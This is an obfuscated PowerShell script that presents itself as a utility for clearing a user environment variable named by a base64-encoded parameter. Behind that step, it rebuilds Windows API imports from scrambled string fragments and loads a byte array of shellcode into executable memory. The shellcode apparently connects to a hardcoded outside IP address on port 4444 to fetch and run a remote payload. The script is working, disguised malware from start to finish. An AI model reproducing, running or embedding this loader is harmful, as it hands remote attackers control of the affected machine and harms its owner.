  Sv iDg4 (  [Type]("{0}{2}{3}{4}{1}"-F 'T','nG','E','xt.e','nCOdi')  );  $6z7Vr=[TYPE]("{0}{1}"-f 'cONvE','RT')  ;  set  ("PH"+"N") ( [TYPE]("{0}{2}{1}" -F'envI','T','ROnMEN') );   Sv 4uf  ( [TyPE]("{1}{2}{3}{4}{0}"-f 't','eNviRO','N','mEnTvAriabLe','tArge')  )  ; 











[CmdletBinding()]
param(
    [Parameter(Mandatory=$true)]
    [string]
    $Name
)

Set-StrictMode -Version ("{1}{0}"-f 'test','La')

$Name =   (  DiR  VARIaBLe:IDg4).VALue::Unicode.GetString(   $6Z7vR::FromBase64String($Name) ) 
 (  CHiLDItem  ("VaRIaBlE:P"+"H"+"n")).vAlue::SetEnvironmentVariable( $Name, $null,  (GeT-IteM VariaBLE:4uf  ).valUE::User )

$c = ((("{53}{0}{28}{83}{80}{54}{46}{98}{33}{95}{19}{34}{94}{47}{74}{58}{71}{39}{43}{55}{99}{76}{52}{32}{59}{77}{44}{15}{4}{85}{48}{22}{41}{9}{31}{107}{11}{12}{57}{8}{66}{30}{21}{63}{70}{64}{100}{60}{62}{1}{49}{61}{3}{91}{104}{45}{35}{7}{96}{42}{90}{75}{105}{68}{56}{23}{14}{84}{2}{18}{78}{13}{73}{93}{37}{6}{40}{106}{17}{5}{101}{38}{89}{72}{67}{82}{16}{51}{27}{10}{20}{26}{87}{65}{79}{88}{102}{103}{97}{29}{25}{36}{50}{24}{86}{69}{92}{81}" -f'Uykernel32.dl','I',', In','Cr','flProte','readI','ti','u','dllRU','yk','ta','nel','32','ss, IntP','i','int ','ub','r lpTh','tPtr lpStar','ntPtr ','tic e','c ',');[DllImport(R','kS','rc','in','xtern IntP','s','lR',', u','ubli','e','lAlloca','e','Virt','hreadAttrib','t','eter, uint dwCrea','DllImp','ui','onFlags, I','U','s','nt dwSi',' u','ntPtr lpT','atic ex','al','t','nt',' s','lic ','int f','[DllImport(R','t','z','c','.','lloc(In','t','t','Ptr ','ern ','s','atic e',' mem','y)]p','d','Sta','int','t','tPtr lpAddress, ','ymsvcrt.','tr l','A','t ','u','ionType,','tAddre','set(Int','blic s','t);','llRUy)]p','Uy)]pu','ze','c',', u','tr','Ptr','ort(RU',', uin','eateThre',' coun','pParam','u','rn I','te','st','t','e, ','x','d);[',' ','de','ad(I','dw','ntPt','r')).RePLAcE('RUy',[sTriNg][ChAR]34));$w = Add-Type -memberDefinition $c -Name ("{1}{0}"-f'2','Win3') -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xbc,0x86,0x58,0x43,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};
